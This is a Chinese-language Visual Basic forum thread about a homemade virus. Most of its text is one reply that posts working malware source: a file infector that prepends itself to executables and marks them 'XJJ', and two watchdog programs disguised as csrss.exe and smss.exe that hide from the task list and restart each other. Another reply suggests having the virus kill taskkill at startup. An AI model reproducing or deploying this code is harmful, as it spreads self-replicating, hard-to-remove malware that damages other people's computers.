VBGood网站全文搜索 Google

搜索VBGood全站网页(全文搜索)

VB爱好者乐园(VBGood)

 找回密码
 立即注册
搜索
楼主: acme_pjz

编了个小病毒

[复制链接]
发表于 2010-10-28 01:23:49 | 显示全部楼层
下来了,,,看看看吧
回复 支持 反对

使用道具 举报

发表于 2010-10-28 21:08:32 | 显示全部楼层
杀毒软件直接不给下,提示病毒~!
回复 支持 反对

使用道具 举报

 楼主| 发表于 2010-10-28 21:48:36 | 显示全部楼层
挖坟的都别挖了,此病毒相当简陋……
回复 支持 反对

使用道具 举报

发表于 2011-7-26 19:38:45 | 显示全部楼层
回:7、8楼
能不能用bat结束A和B进程?
taskkill /f /im A.exe
……………………B.exe

点评

是谁挖的坟?  发表于 2011-7-27 15:16
回复 支持 反对

使用道具 举报

发表于 2011-8-3 15:54:00 | 显示全部楼层
加一个 感染代码
Private Function InfectedFiles(ByVal FilePath As String) As Boolean
Dim MyArray() As Byte
Dim FileArray() As Byte

MyName = App.Path & "\" & App.EXEName & ".exe"

     If FileLen(FilePath) > 4194304 Then Exit Function

     Open MyName For Binary Access Read As #1 '读取自身文件内容
         ReDim MyArray(FileLen(MyName) - 1)
         Get #1, , MyArray
     Close #1

     Open FilePath For Binary Access Read As #1 '读取要感染的问件内容
         ReDim FileArray(FileLen(FilePath) - 1)
         Get #1, , FileArray
     Close #1

     If InStr(FileArray, "XJJ") > 0 Then '判断是否被感染
         Exit Function
     Else
         Open FilePath For Binary Access Write As #1 '把自身和感染文件与配置信息一起写到一个新文件去
             Put #1, , MyArray
             Put #1, , FileArray
             Put #1, , "XJJ" & UBound(MyArray) + 1 & "," & UBound(FileArray) + 1
         Close #1
         InfectedFiles = True
     End If
End Function
Private Function KillVirus(ByVal VirusPath As String) As Boolean '用于分离病毒主体,因为我太良民了
Dim infected() As Byte
Dim vbArray() As Byte
Dim SplitArray() As String
Dim SplitINI() As String

     On Error Resume Next

     out = App.Path & "\" & "My.exe" '输出目录

     Open VirusPath For Binary Access Read As #1 '读取自身文件内容
         ReDim infected(FileLen(VirusPath) - 1)
         Get #1, , infected
     Close #1

     If InStr(StrConv(infected, vbUnicode), "XJJ") > 0 Then '判断是否被感染
         SplitArray = Split(StrConv(infected, vbUnicode), "XJJ")
         SplitINI = Split(SplitArray(UBound(SplitArray)), ",")
         ReDim vbArray(SplitINI(1) - 1)
         Open VirusPath For Binary As #1
             Get #1, SplitINI(0) + 1, vbArray
         Close #1
         Open out For Binary As #1
             Put #1, , vbArray
         Close #1
         Shell out, vbNormalFocus '运行
     End If
End Function


Private Sub Form_Load()
Me.Hide
InfectedFiles "F:\BD\ProcKiller.exe" '=========测试文件只感染他

If FileLen(App.Path & "\" & App.EXEName & ".exe") > 61920 Then '附体运行
KillVirus App.Path & "\" & App.EXEName & ".exe"
退出代码略
Else
End '
End If

End Sub




加一个 双进程代码
程序1: csrss.exe
Option Explicit
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Function CreateToolhelpSnapshot Lib "kernel32" Alias "CreateToolhelp32Snapshot" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private Declare Function ProcessFirst Lib "kernel32" Alias "Process32First" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function Module32First Lib "kernel32" (ByVal hSnapshot As Long, lppe As MODULEENTRY32) As Long
Private Declare Function Module32Next Lib "kernel32" (ByVal hSnapshot As Long, lppe As MODULEENTRY32) As Long
Private Declare Function ProcessNext Lib "kernel32" Alias "Process32Next" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Private Type PROCESSENTRY32
    dwSize As Long
    cntUsage As Long
    th32ProcessID As Long
    th32DefaultHeapID As Long
    th32ModuleID As Long
    cntThreads As Long
    th32ParentProcessID As Long
    pcPriClassBase As Long
    dwFlags As Long
    szExeFile As String * 260
End Type

Const TH32CS_SNAPPROCESS = &H2

Const TH32CS_SNAPmodule = &H8

Private Type MODULEENTRY32
    dwSize As Long
    th32ModuleID As Long
    th32ProcessID As Long
    GlblcntUsage As Long
    ProccntUsage As Long
    modBaseAddr As Byte
    modBaseSize As Long
    hModule As Long
    szModule As String * 256
    szExePath As String * 1024
End Type

Private Sub Command1_Click()

    End

End Sub

Private Sub Command2_Click()
Timer1.Enabled = False
End Sub

Private Sub Form_Load()

    App.TaskVisible = False '不要在任务管理内显示

End Sub

Private Sub Timer1_Timer()

Dim ret As Long, lPid As Long
Dim isLive As Boolean
Dim Mode As MODULEENTRY32, Proc As PROCESSENTRY32
Dim hSnapshot As Long, hMSnapshot As Long
Dim sFilename As String

    If Dir(App.Path + "\stop") <> "" Then Exit Sub '如果当前文件夹内存在stop这个文件 则停止双进程保护

    sFilename = App.Path + "\smss.exe" '另一个进程的路径

    hSnapshot = CreateToolhelpSnapshot(TH32CS_SNAPPROCESS, 0)
    Proc.dwSize = Len(Proc)
    Mode.dwSize = Len(Mode)

    lPid = ProcessFirst(hSnapshot, Proc)
    Do While lPid <> 0
        hMSnapshot = CreateToolhelpSnapshot(TH32CS_SNAPmodule, Proc.th32ProcessID)
        Mode.szExePath = Space$(256)
        ret = Module32First(hMSnapshot, Mode)
        If ret > 0 Then
            If InStr(1, Mode.szExePath, sFilename, vbTextCompare) > 0 Then 'Mode.szExePath=进程路径
                isLive = True '找到目标进程
                CloseHandle hMSnapshot
                Exit Do
            End If
        End If
        CloseHandle hMSnapshot
        lPid = ProcessNext(hSnapshot, Proc)
    Loop
    CloseHandle hSnapshot
    If Not isLive Then
        ShellExecute 0, "", sFilename, "", "", 1 '如果目标进程不存在 则启动它
    End If

End Sub



程序2: smss.exe
Option Explicit
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Function CreateToolhelpSnapshot Lib "kernel32" Alias "CreateToolhelp32Snapshot" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private Declare Function ProcessFirst Lib "kernel32" Alias "Process32First" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function Module32First Lib "kernel32" (ByVal hSnapshot As Long, lppe As MODULEENTRY32) As Long
Private Declare Function Module32Next Lib "kernel32" (ByVal hSnapshot As Long, lppe As MODULEENTRY32) As Long
Private Declare Function ProcessNext Lib "kernel32" Alias "Process32Next" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Private Type PROCESSENTRY32
    dwSize As Long
    cntUsage As Long
    th32ProcessID As Long
    th32DefaultHeapID As Long
    th32ModuleID As Long
    cntThreads As Long
    th32ParentProcessID As Long
    pcPriClassBase As Long
    dwFlags As Long
    szExeFile As String * 260
End Type

Const TH32CS_SNAPPROCESS = &H2

Const TH32CS_SNAPmodule = &H8

Private Type MODULEENTRY32
    dwSize As Long
    th32ModuleID As Long
    th32ProcessID As Long
    GlblcntUsage As Long
    ProccntUsage As Long
    modBaseAddr As Byte
    modBaseSize As Long
    hModule As Long
    szModule As String * 256
    szExePath As String * 1024
End Type

Private Sub Command1_Click()

    End

End Sub

Private Sub Command2_Click()
Timer1.Enabled = False
End Sub

Private Sub Form_Load()

    App.TaskVisible = False '不要在任务管理内显示

End Sub

Private Sub Timer1_Timer()

Dim ret As Long, lPid As Long
Dim isLive As Boolean
Dim Mode As MODULEENTRY32, Proc As PROCESSENTRY32
Dim hSnapshot As Long, hMSnapshot As Long
Dim sFilename As String

    If Dir(App.Path + "\stop") <> "" Then Exit Sub '如果当前文件夹内存在stop这个文件 则停止双进程保护

    sFilename = App.Path + "\csrss.exe"

    hSnapshot = CreateToolhelpSnapshot(TH32CS_SNAPPROCESS, 0)
    Proc.dwSize = Len(Proc)
    Mode.dwSize = Len(Mode)

    lPid = ProcessFirst(hSnapshot, Proc)
    Do While lPid <> 0
        hMSnapshot = CreateToolhelpSnapshot(TH32CS_SNAPmodule, Proc.th32ProcessID)
        Mode.szExePath = Space$(256)
        ret = Module32First(hMSnapshot, Mode)
        If ret > 0 Then
            If InStr(1, Mode.szExePath, sFilename, vbTextCompare) > 0 Then
                isLive = True
                CloseHandle hMSnapshot
                Exit Do
            End If
        End If
        CloseHandle hMSnapshot
        lPid = ProcessNext(hSnapshot, Proc)
    Loop
    CloseHandle hSnapshot
    If Not isLive Then
        ShellExecute 0, "", sFilename, "", "", 1
    End If

End Sub



申明哈,偶是一个善良滴人....

点评

不要挖坟了  发表于 2011-8-14 21:56
回复 支持 反对

使用道具 举报

发表于 2011-8-14 21:45:46 | 显示全部楼层
taskkill /f /im frmwork*
so..最好病毒启动的时候把taskkill也弄死吧

点评

不要挖坟了  发表于 2011-8-14 21:56
回复 支持 反对

使用道具 举报

发表于 2011-8-14 21:46:37 | 显示全部楼层
回复 freehack 的帖子

V5...好邪恶
回复 支持 反对

使用道具 举报

发表于 2011-8-14 21:46:50 | 显示全部楼层
回复 freehack 的帖子

V5...好邪恶
回复 支持 反对

使用道具 举报

发表于 2011-8-28 23:32:11 | 显示全部楼层
请问楼主  为什么下载不了呢   咱也想看看    可就是看不到

点评

这坟挖的...越来越深...  发表于 2011-8-29 00:07
回复 支持 反对

使用道具 举报

发表于 2011-10-6 17:01:50 | 显示全部楼层
臣惶恐啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

文字版|手机版|小黑屋|VBGood  

GMT+8, 2022-7-1 19:37

VB爱好者乐园(VBGood)
快速回复 返回顶部 返回列表